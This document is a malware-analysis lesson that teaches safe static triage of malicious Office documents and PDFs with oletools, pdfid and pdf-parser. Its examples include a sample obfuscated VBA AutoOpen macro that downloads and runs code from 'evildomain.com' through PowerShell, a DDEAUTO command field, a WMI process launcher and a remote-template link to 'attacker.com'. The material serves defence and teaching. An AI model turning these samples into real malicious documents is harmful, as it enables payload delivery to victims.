What You'll Learn
- Explain why Office documents remain the number one malware delivery vector and how attackers exploit user trust
- Understand the OLE2 Compound Binary Format and how it embeds VBA macro code, embedded objects, and metadata
- Identify common VBA macro triggers (AutoOpen, Document_Open, Workbook_Open) and their execution conditions
- Use the oletools suite (olevba, oleid, rtfobj, mraptor) to extract, analyze, and assess macro risk without opening the document
- Apply macro deobfuscation techniques to decode string concatenation, Chr() encoding, environment variable abuse, and WMI execution paths
- Analyze modern document threats including XLM 4.0 macros, DDE injection, and template injection via remote templates
- Perform basic PDF malware analysis targeting JavaScript payloads, embedded files, and launch actions
- Follow a safer analysis workflow that avoids direct document opening at every stage
Many phishing campaigns start the same way: an email with an attachment. That attachment is very often a document: a Word file, an Excel spreadsheet, or a PDF. According to figures cited in annual threat reports, malicious Office documents have accounted for over 40% of malware delivery, ahead of executables, scripts, and archives. This lesson teaches you to dissect those documents without ever opening them.
Why Office Documents Dominate Malware Delivery
Three factors make Office documents the perfect weapon:
| Factor | Why It Works |
|---|---|
| Trust | Users open documents every day — invoices, reports, contracts. A .docx feels safe in a way that a .exe never does. |
| Built-in code execution | VBA macros provide a full programming environment embedded inside the document. Microsoft designed this for automation — attackers repurposed it for payload delivery. |
| Evasion | Document files bypass many email gateways and endpoint protections that focus on executable files. Macros execute inside a trusted application (Word, Excel), inheriting its reputation. |
Microsoft's mitigation timeline. Microsoft began blocking macros in files downloaded from the internet by default in 2022 (Mark of the Web + VBA blocking). Attackers adapted with template injection, OneNote containers, ISO files, and other bypass techniques. The core analysis skills in this lesson apply regardless of which bypass technique is currently in vogue.
OLE2 File Format: What Is Inside a .doc File?
The OLE2 Compound Binary Format (also called Compound File Binary Format) is a file system within a file. Think of a .doc file as a miniature FAT filesystem containing multiple "streams" — named data blobs that hold document content, formatting, macros, embedded objects, and metadata.
| Stream | Contents |
|---|---|
| WordDocument | The document text and formatting |
| Macros/VBA/ThisDocument | VBA macro source code |
| Macros/VBA/Module1 | Additional VBA modules |
| \x01CompObj | Application identification |
| \x05SummaryInformation | Document metadata (author, dates, etc.) |
| ObjectPool/ | Embedded OLE objects (other files inside the document) |
Modern .docx/.xlsx/.pptx files use the Open XML format (a ZIP archive containing XML files). VBA macros in Open XML files still live in an OLE2 container embedded within the ZIP structure (vbaProject.bin), and only the macro-enabled variants (.docm, .xlsm, .pptm) are meant to carry one. Malware authors frequently use the legacy .doc/.xls format specifically because the OLE2 binary format is harder to inspect casually.
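The two container types can be told apart from their first bytes, without any Office parser. The following is a minimal sketch using only the Python standard library; the function names `container_type` and `find_vba_parts` are illustrative and are not part of oletools.

```python
import io
import zipfile

OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # Compound File Binary signature
ZIP_MAGIC = b"PK\x03\x04"                        # local file header of a ZIP entry


def container_type(data: bytes) -> str:
    """Classify raw file bytes as 'ole2', 'zip' (possible Open XML), or 'unknown'."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"


def find_vba_parts(data: bytes) -> list[str]:
    """Return ZIP member names that look like an embedded VBA project."""
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        return [name for name in archive.namelist()
                if name.lower().endswith("vbaproject.bin")]


# Build a tiny fake macro-enabled archive in memory for demonstration.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("word/document.xml", "<w:document/>")
    archive.writestr("word/vbaProject.bin", OLE2_MAGIC)
sample = buffer.getvalue()

print(container_type(sample), find_vba_parts(sample))
```

A signature check only identifies the container. It says nothing about whether the content is malicious, so it belongs at the very start of triage.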
VBA Macro Triggers
Macros do not execute by themselves. They need a trigger. Attackers use auto-execution hooks that fire when the document is opened:
| Trigger | Application | When It Fires |
|---|---|---|
| AutoOpen() | Word | When a .doc document is opened (legacy) |
| Document_Open() | Word | When a macro-enabled document (.doc or .docm) is opened |
| Auto_Open() | Excel | When a .xls workbook is opened (legacy) |
| Workbook_Open() | Excel | When a macro-enabled workbook (.xls or .xlsm) is opened |
| AutoExec() | Word | When Word starts (template-based) |
| AutoClose() | Word | When the document is closed (delayed execution) |
| Document_Close() | Word | When the document is closed |
AutoClose and Document_Close are sneaky. Malware that triggers on document close evades sandboxes that only monitor the first few seconds after opening. If your sandbox opens the file, waits 60 seconds, and sees nothing, it marks the file clean. The payload fires when the sandbox closes the document. Always check for close-triggered macros.
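Once macro source has been extracted as text, checking for both open and close triggers can be scripted. This is a minimal sketch, assuming the VBA source is already available as a string; `find_triggers` and the two name sets are illustrative and cover only the triggers listed in the table above.

```python
import re

OPEN_TRIGGERS = {"autoopen", "document_open", "auto_open", "workbook_open", "autoexec"}
CLOSE_TRIGGERS = {"autoclose", "document_close"}

# Matches "Sub Name(" at the start of a line, with optional Private/Public.
SUB_PATTERN = re.compile(
    r"^\s*(?:(?:private|public)\s+)?sub\s+(\w+)\s*\(",
    re.IGNORECASE | re.MULTILINE,
)


def find_triggers(vba_source: str) -> dict[str, list[str]]:
    """Group auto-execution procedure names into open-time and close-time triggers."""
    found = {"open": [], "close": []}
    for name in SUB_PATTERN.findall(vba_source):
        key = name.lower()  # VBA identifiers are case-insensitive
        if key in OPEN_TRIGGERS:
            found["open"].append(name)
        elif key in CLOSE_TRIGGERS:
            found["close"].append(name)
    return found


sample = """
Sub AutoOpen()
End Sub
Private Sub Document_Close()
End Sub
Sub Helper()
End Sub
"""
print(find_triggers(sample))
```

A non-empty `close` list is a hint that a sandbox run should include closing the document before the verdict is recorded.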
The oletools Suite
oletools is a Python toolkit purpose-built for analyzing OLE2 files and VBA macros. It is widely used for document malware analysis in SOC teams.
Installation
# Install oletools (pre-installed on REMnux)
pip install oletools
# Verify installation
olevba --help
oleid --help
oleid: Quick Identification
oleid performs a rapid triage of a document file, reporting whether it contains macros, encrypted content, external relationships, or other risk indicators:
$ oleid suspicious_invoice.doc
Filename: suspicious_invoice.doc
Indicator Value
----------------------------- ---------
File format OLE
Container format OLE
Application name Microsoft Office Word
Encrypted False
VBA Macros Yes
XLM Macros No
External Relationships No
ObjectPool No
Flash objects 0
The key fields: VBA Macros: Yes tells you there is code to extract. External Relationships would indicate template injection. ObjectPool would indicate embedded OLE objects.
olevba: Extract and Deobfuscate VBA
olevba is the workhorse. It extracts VBA macro source code, identifies suspicious keywords, and performs basic deobfuscation:
$ olevba suspicious_invoice.doc
VBA MACRO ThisDocument.cls
in file: suspicious_invoice.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
Dim cmd As String
cmd = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114)
cmd = cmd & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)
Dim url As String
url = "http://evil" & "domain.com" & "/payload.exe"
Shell cmd & " -c ""IEX(New-Object Net.WebClient).DownloadString('" & url & "')""", vbHide
End Sub
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |AutoOpen |Runs when the Word document is opened |
|Suspicious|Shell |May run an executable file or a system command|
|Suspicious|Chr |May obfuscate strings (Chr decoding) |
|Suspicious|vbHide |May run a hidden process |
|IOC |http://evildomain |URL (potentially malicious) |
+----------+--------------------+---------------------------------------------+
rtfobj: RTF Embedded Objects
RTF files can embed OLE objects that execute on open. rtfobj extracts these:
$ rtfobj malicious_resume.rtf
File: malicious_resume.rtf
RTF Embedded Objects:
id: 0
format_id: 2 (Embedded)
class name: 'Package'
data size: 45312
OLE Package:
Filename: update.exe
Source path: C:\Temp\update.exe
Temp path: C:\Temp\update.exe
# Extract the embedded object for further analysis
$ rtfobj -s all malicious_resume.rtf
Saved object to: malicious_resume.rtf_object_0.bin
mraptor: Macro Risk Assessment
mraptor performs a quick risk assessment — does the document auto-execute macros, write files, or execute commands?
$ mraptor suspicious_invoice.doc
FILE: suspicious_invoice.doc
Result: SUSPICIOUS
Flags: AutoExec, Write, Execute
- Auto-execution trigger: AutoOpen
- File write capability: Shell command
- Code execution: Shell function call
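The three flags to watch: AutoExec (runs without user action beyond opening), Write (creates/modifies files), Execute (runs commands or processes). mraptor abbreviates these as A, W, and X, and treats a macro as suspicious when AutoExec is combined with Write or Execute.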
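The way the three flags combine into a verdict can be modelled in a few lines. The sketch below is a simplified illustration, assuming the rule "auto-execution plus either write or execute is suspicious"; the keyword patterns are short samples chosen for this example and are not mraptor's actual detection patterns.

```python
import re

# Illustrative keyword samples only; real tools use far more extensive patterns.
AUTOEXEC = re.compile(
    r"\b(AutoOpen|Document_Open|Auto_Open|Workbook_Open|AutoClose|Document_Close)\b",
    re.IGNORECASE,
)
WRITE = re.compile(
    r"\b(SaveToFile|URLDownloadToFile|FileCopy|For\s+Output|For\s+Binary|For\s+Append)\b",
    re.IGNORECASE,
)
EXECUTE = re.compile(r"\b(Shell|CreateObject|GetObject|Win32_Process)\b", re.IGNORECASE)


def assess(vba_source: str) -> tuple[str, bool]:
    """Return a three-character flag string and a suspicious/not-suspicious verdict."""
    a = bool(AUTOEXEC.search(vba_source))
    w = bool(WRITE.search(vba_source))
    x = bool(EXECUTE.search(vba_source))
    flags = ("A" if a else "-") + ("W" if w else "-") + ("X" if x else "-")
    # A macro that can write or execute but never runs on its own is lower risk.
    return flags, a and (w or x)


dropper = 'Sub AutoOpen()\n    Shell "calc.exe", vbHide\nEnd Sub'
helper = 'Sub Run()\n    Shell "calc.exe"\nEnd Sub'
print(assess(dropper))
print(assess(helper))
```

The second sample shows why the AutoExec flag matters: the same `Shell` call is only flagged as suspicious when something triggers it automatically.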
Macro Deobfuscation Techniques
Attackers obfuscate macro code to bypass static analysis and AV signatures. Here are the most common techniques and how to decode them:
String Concatenation
' Obfuscated
Dim s As String
s = "pow" & "ersh" & "ell" & ".e" & "xe"
' Deobfuscated: powershell.exe
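Joining split literals by hand gets tedious on long chains. A minimal sketch, assuming the expression consists only of double-quoted literals joined with `&` or `+` (variables and function calls are ignored); `join_vba_literals` is an illustrative name:

```python
import re


def join_vba_literals(expression: str) -> str:
    """Join the double-quoted VBA string literals found in an expression."""
    # A VBA literal is "..." where an embedded quote is written as "".
    literals = re.findall(r'"((?:[^"]|"")*)"', expression)
    return "".join(part.replace('""', '"') for part in literals)


print(join_vba_literals('"pow" & "ersh" & "ell" & ".e" & "xe"'))  # powershell.exe
```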
Chr() Encoding
' Obfuscated
s = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)
' Deobfuscated: powershell
' Decode manually: 112=p, 111=o, 119=w, 101=e, 114=r, 115=s, 104=h, 101=e, 108=l, 108=l
# Quick Python decoder for Chr() chains
import re
code = 'Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)'
result = ''.join(chr(int(x)) for x in re.findall(r'Chr\((\d+)\)', code))
print(result) # powershell
Environment Variable Abuse
' Obfuscated — uses environment variables to avoid string detection
Dim path As String
path = Environ("COMSPEC") ' Resolves to C:\Windows\system32\cmd.exe
' Or building paths dynamically
path = Environ("APPDATA") & "\update.exe"   ' VBA strings do not use backslash escapes
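To read such code statically, it helps to substitute typical values for the environment lookups. This is a minimal sketch under stated assumptions: the `TYPICAL_ENV` table holds common Windows defaults, `analyst` is a placeholder user name, and `resolve_environ` is an illustrative helper.

```python
import re

# Typical defaults on a Windows host; "analyst" is a placeholder user name.
TYPICAL_ENV = {
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
    "APPDATA": r"C:\Users\analyst\AppData\Roaming",
    "TEMP": r"C:\Users\analyst\AppData\Local\Temp",
}


def resolve_environ(vba_line: str) -> str:
    """Replace Environ("NAME") calls with a quoted typical value; unknown names stay as-is."""
    def substitute(match: re.Match) -> str:
        value = TYPICAL_ENV.get(match.group(1).upper())
        return f'"{value}"' if value is not None else match.group(0)

    return re.sub(r'Environ\$?\(\s*"(\w+)"\s*\)', substitute, vba_line, flags=re.IGNORECASE)


print(resolve_environ(r'path = Environ("APPDATA") & "\update.exe"'))
```

The real value on a victim host will differ per user, so treat the resolved path as a pattern to hunt for rather than an exact indicator.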
WMI Execution
' Obfuscated — uses WMI to execute commands instead of Shell()
Dim objWMI As Object
Set objWMI = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
objWMI.Create "powershell.exe -enc JABjAGwA..."
' This avoids triggering rules that look for Shell() or CreateObject("WScript.Shell")
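The argument to `powershell.exe -enc` is Base64 over UTF-16LE text, so it can be decoded offline. A minimal sketch (`decode_powershell_enc` is an illustrative name); it decodes only the prefix that is visible in the sample above, since the rest is elided:

```python
import base64


def decode_powershell_enc(encoded: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 over UTF-16LE text)."""
    return base64.b64decode(encoded).decode("utf-16-le")


# Only the visible prefix of the sample; the elided remainder is unknown.
print(decode_powershell_enc("JABjAGwA"))  # $cl
```

Decoding with plain UTF-8 instead would leave a NUL byte after every character, which is a common reason a first decoding attempt looks garbled.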
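olevba handles simple deobfuscation automatically. Run olevba --decode to display decoded hex and Base64 strings, and olevba --deobf to additionally attempt to resolve Chr() sequences and concatenated values (this mode is slower and can fail on complex code). For heavily obfuscated macros, combine olevba output with manual Python scripting and ViperMonkey (a VBA emulator that interprets macro code instead of running it inside Office).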
Modern Document Threats
VBA macros are the classic attack, but modern threats have expanded beyond them:
XLM 4.0 Macros (Excel)
XLM macros predate VBA and are stored in hidden Excel sheets rather than VBA modules. Many security tools miss them because they do not look like traditional macros:
# XLM macros live in hidden sheets, not VBA streams
# Recent olevba versions attempt XLM extraction by default; XLMMacroDeobfuscator is a dedicated alternative
$ olevba suspicious_spreadsheet.xls
# Or use the dedicated tool
$ xlmdeobfuscator -f suspicious_spreadsheet.xls
| XLM Feature | Why It Is Dangerous |
|---|---|
| Stored in hidden sheets | Not visible in VBA editor; analysts miss them |
| No VBA stream | Tools scanning for VBA macros report "no macros found" |
| EXEC() and CALL() functions | Can execute arbitrary commands and DLL functions |
| Formula-based | Logic expressed as cell formulas, harder to read than VBA |
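For Open XML workbooks (.xlsx/.xlsm), sheet visibility is recorded in `xl/workbook.xml`, so hidden sheets can be listed without opening Excel. This is a minimal standard-library sketch; it does not apply to legacy binary .xls files, and `hidden_sheets` is an illustrative name. For untrusted input, a hardened XML parser is a safer choice than the default one used here.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

SHEET_NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"


def hidden_sheets(workbook_bytes: bytes) -> list[tuple[str, str]]:
    """Return (sheet name, state) for every sheet that is not visible."""
    with zipfile.ZipFile(io.BytesIO(workbook_bytes)) as archive:
        root = ET.fromstring(archive.read("xl/workbook.xml"))
    result = []
    for sheet in root.iter(SHEET_NS + "sheet"):
        state = sheet.get("state", "visible")  # attribute is absent for visible sheets
        if state != "visible":
            result.append((sheet.get("name"), state))
    return result


# Demonstration with a minimal in-memory workbook skeleton.
workbook_xml = (
    '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
    '<sheets><sheet name="Invoice" sheetId="1"/>'
    '<sheet name="Macro1" sheetId="2" state="veryHidden"/></sheets></workbook>'
)
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("xl/workbook.xml", workbook_xml)

print(hidden_sheets(buffer.getvalue()))
```

A `veryHidden` sheet cannot be unhidden from the normal Excel interface, which makes it a stronger signal than a plain `hidden` one.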
DDE Injection (Dynamic Data Exchange)
DDE allows Office documents to pull data from other applications. Attackers abuse this to execute commands without any macros:
# DDE field in a Word document
{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -c IEX(...)" }
# The document has NO macros — oleid reports VBA Macros: No
# But opening it prompts "This document contains links to other data sources"
DDE attacks have no macros to scan. Traditional macro analysis tools report the document as clean. Look for DDE fields in the document XML (word/document.xml in .docx files) or run msodde, the oletools utility dedicated to detecting DDE and DDEAUTO links. Users see a prompt about "updating links" rather than a macro warning, which makes the social engineering more effective.
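A manual check of `word/document.xml` can be approximated with the standard library. This is a rough sketch, not a replacement for a dedicated tool: it assumes field instructions appear in `<w:instrText>` runs or `w:instr` attributes, and it joins all runs because a field code may be split across several of them. `find_dde_fields` is an illustrative name.

```python
import io
import re
import zipfile

DDE_PATTERN = re.compile(r"\bDDE(AUTO)?\b", re.IGNORECASE)


def find_dde_fields(docx_bytes: bytes) -> list[str]:
    """Return field instruction text from word/document.xml that mentions DDE or DDEAUTO."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        xml_text = archive.read("word/document.xml").decode("utf-8", errors="replace")
    # Complex fields: instruction text may be split over several runs, so join them.
    runs = re.findall(r"<w:instrText[^>]*>(.*?)</w:instrText>", xml_text, re.DOTALL)
    candidates = ["".join(runs)]
    # Simple fields carry the instruction in a w:instr attribute.
    candidates += re.findall(r'w:instr="([^"]*)"', xml_text)
    return [text.strip() for text in candidates if DDE_PATTERN.search(text)]


# Demonstration: the field code is deliberately split across two runs.
document_xml = (
    "<w:document><w:r><w:instrText>DDE</w:instrText></w:r>"
    "<w:r><w:instrText>AUTO c:\\\\windows\\\\system32\\\\cmd.exe /k calc</w:instrText></w:r>"
    "</w:document>"
)
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("word/document.xml", document_xml)

print(find_dde_fields(buffer.getvalue()))
```

Because all runs are joined, the returned text may contain several unrelated fields; treat a hit as a reason to inspect the XML more closely.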
Template Injection
Template injection loads a remote template containing malicious macros. The document itself has no macros — it just references a URL:
<!-- Inside the .docx ZIP: word/_rels/settings.xml.rels -->
<Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="https://attacker.com/template.dotm" TargetMode="External"/>
The attack flow:
- User opens a clean-looking .docx (no macros, passes AV)
- Word fetches the remote template from the attacker's server
- The template contains VBA macros that execute
Detection: check for External Relationships in oleid output, or manually inspect the _rels/ directory inside the docx ZIP file.
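The manual inspection of the `_rels/` directories can be scripted. This is a minimal standard-library sketch, assuming the file is a well-formed Open XML ZIP; `external_relationships` is an illustrative name, and the demonstration URL is a placeholder. For untrusted input, a hardened XML parser is a safer choice than the default one used here.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_TAG = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"


def external_relationships(docx_bytes: bytes) -> list[tuple[str, str, str]]:
    """Return (rels file, relationship type, target) for every external relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for name in archive.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(archive.read(name))
            for rel in root.iter(REL_TAG):
                if rel.get("TargetMode") == "External":
                    # Keep only the last path segment of the type URI, e.g. attachedTemplate.
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((name, rel_type, rel.get("Target", "")))
    return findings


# Demonstration with a placeholder URL and one ordinary internal relationship.
rels_xml = (
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
    'Target="https://attacker.example/template.dotm" TargetMode="External"/>'
    '<Relationship Id="rId2" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" '
    'Target="styles.xml"/>'
    "</Relationships>"
)
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("word/_rels/settings.xml.rels", rels_xml)

print(external_relationships(buffer.getvalue()))
```

Ordinary hyperlinks are also stored as external relationships, so the relationship type matters: an external `attachedTemplate` is the one that points to template injection.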
PDF Malware Analysis
PDFs can contain JavaScript, embedded files, and launch actions. While less common than Office malware, PDF-based attacks target organizations that have blocked Office macros.
Key PDF Analysis Tools
| Tool | Purpose |
|---|---|
| pdf-parser | Parse PDF structure, extract streams and objects |
| pdfid | Quick triage: counts JavaScript, embedded files, launch actions |
| peepdf | Interactive PDF analysis framework |
Quick PDF Triage with pdfid
$ pdfid suspicious_report.pdf
PDFiD 0.2.8 suspicious_report.pdf
PDF Header: %PDF-1.7
obj 12
endobj 12
stream 4
endstream 4
/Page 1
/JS 2 <-- JavaScript present!
/JavaScript 2 <-- JavaScript present!
/OpenAction 1 <-- Runs on document open!
/EmbeddedFile 1 <-- Contains embedded file!
/Launch 0
/AcroForm 0
Red flags: /JS or /JavaScript (embedded code), /OpenAction (auto-execute on open), /EmbeddedFile (file inside the PDF), /Launch (execute external application), /AA (additional actions).
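The idea behind this kind of triage is a keyword count over the raw bytes. The sketch below is a simplified illustration of that idea and not a reimplementation of pdfid: it does not handle names obfuscated with hex escapes or keywords hidden inside compressed streams. `count_pdf_keywords` is an illustrative name.

```python
import re

KEYWORDS = [b"/JS", b"/JavaScript", b"/OpenAction", b"/AA", b"/EmbeddedFile", b"/Launch"]


def count_pdf_keywords(data: bytes) -> dict[str, int]:
    """Count occurrences of risky PDF name objects in raw file bytes."""
    counts = {}
    for keyword in KEYWORDS:
        # A name must end at a non-alphanumeric byte, so /JS does not match /JSFoo.
        pattern = re.escape(keyword) + rb"(?![A-Za-z0-9])"
        counts[keyword.decode("ascii")] = len(re.findall(pattern, data))
    return counts


sample = (
    b"%PDF-1.7\n"
    b"1 0 obj << /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /JavaScript /JS (app.alert(1)) >> endobj\n"
)
print(count_pdf_keywords(sample))
```

A zero count from a naive scan like this is weak evidence of a clean file, which is why the dedicated tools remain the first choice.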
Extracting PDF JavaScript
# Use pdf-parser to extract JavaScript streams
$ pdf-parser --search javascript suspicious_report.pdf
obj 8 0
Type: /Action
Contains stream
/S /JavaScript
/JS (stream content)
# Extract the stream
$ pdf-parser --object 8 --filter --raw suspicious_report.pdf > extracted_js.txt
Safer Analysis Workflow
The golden rule of document malware analysis: never open the document in its native application until you have exhausted every static analysis technique.
| Step | Action | Tool |
|---|---|---|
| 1 | Hash and check reputation | sha256sum → VirusTotal lookup |
| 2 | Quick triage | oleid (Office) or pdfid (PDF) — identify risk indicators |
| 3 | Extract macros | olevba --deobf (Office) or pdf-parser (PDF) |
| 4 | Assess risk | mraptor — AutoExec + Write + Execute flags |
| 5 | Extract embedded objects | rtfobj (RTF) or pdf-parser (PDF) |
| 6 | Deobfuscate manually | Python scripting for remaining encoded strings |
| 7 | Dynamic analysis (if needed) | Open in sandboxed VM with network monitoring (Lesson 11.3-11.4 techniques) |
Never open suspicious documents on your analysis workstation. Even with macros disabled, documents can exploit parser vulnerabilities in Office or PDF readers. Always use a dedicated analysis VM. If you must view the document content visually, use LibreOffice in a Linux VM (different parser, different vulnerability surface) or convert to PDF/image first.
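Step 1 of the workflow can also be done from Python when `sha256sum` is not available. A minimal sketch that reads the file in chunks so large samples do not need to fit in memory; `sha256_of_file` is an illustrative name:

```python
import hashlib


def sha256_of_file(path: str, chunk_size: int = 65536) -> str:
    """Return the hex SHA-256 digest of a file, reading it in fixed-size chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        # iter() with a sentinel keeps calling read() until it returns empty bytes.
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

Hashing reads the file as raw bytes and never parses it, so this step is safe to run on a suspicious sample. Looking up the hash, rather than uploading the file, also avoids disclosing the sample itself.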
Key Takeaways
- Office documents are the #1 malware delivery vector because users trust them, they contain built-in code execution (VBA), and they bypass many security controls designed for executables
- The OLE2 format is a file system within a file — macros, embedded objects, and metadata live in named streams that oletools can extract and inspect
- Auto-execution triggers (AutoOpen, Document_Open, Workbook_Open) fire when documents are opened; close triggers (AutoClose, Document_Close) evade sandboxes that only monitor opening
- oletools is the standard SOC toolkit: oleid for triage, olevba for extraction and deobfuscation, rtfobj for RTF objects, mraptor for risk assessment
- Common deobfuscation patterns: string concatenation, Chr() encoding, environment variable resolution, and WMI-based execution to avoid Shell() detection
- Modern threats extend beyond VBA: XLM 4.0 macros hide in spreadsheet cells, DDE injection has no macros at all, and template injection fetches remote payloads
- PDF analysis uses pdfid for triage and pdf-parser for stream extraction — watch for /JS, /OpenAction, /EmbeddedFile, and /Launch indicators
- The safer analysis workflow exhausts static techniques before dynamic analysis: hash → triage → extract → deobfuscate → sandbox (only if needed)
What's Next
You can now dissect the most common malware delivery vector without ever opening the document. In Lesson 11.6, we bring everything together — you will learn to read sandbox reports from platforms like Any.Run, Hybrid Analysis, and VirusTotal, extract IOCs from automated analysis, and build a complete malware analysis report that connects static findings, dynamic behavior, and detection recommendations into a single deliverable.
Knowledge Check: Office Document & Macro Analysis
Why are Office documents the most common malware delivery vector, ahead of executables?
In the OLE2 Compound Binary Format, where is VBA macro source code stored?
Why should analysts check for AutoClose and Document_Close macro triggers in addition to AutoOpen?
In Lab 11.5, you use oletools to analyze a malicious document. Which tool extracts VBA macro source code and performs basic deobfuscation?
A macro contains: Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108). What does this decode to?
What makes DDE (Dynamic Data Exchange) injection particularly dangerous compared to VBA macros?
In Lab 11.5, you encounter a .docx file that oleid reports has no VBA macros but has 'External Relationships: Yes'. What attack technique does this suggest?
When using mraptor for macro risk assessment, which combination of flags indicates the highest risk?
When performing quick PDF triage with pdfid, which indicators suggest the PDF contains an exploit or payload?
In the safer analysis workflow, why should you exhaust static analysis techniques before opening a document in a sandbox?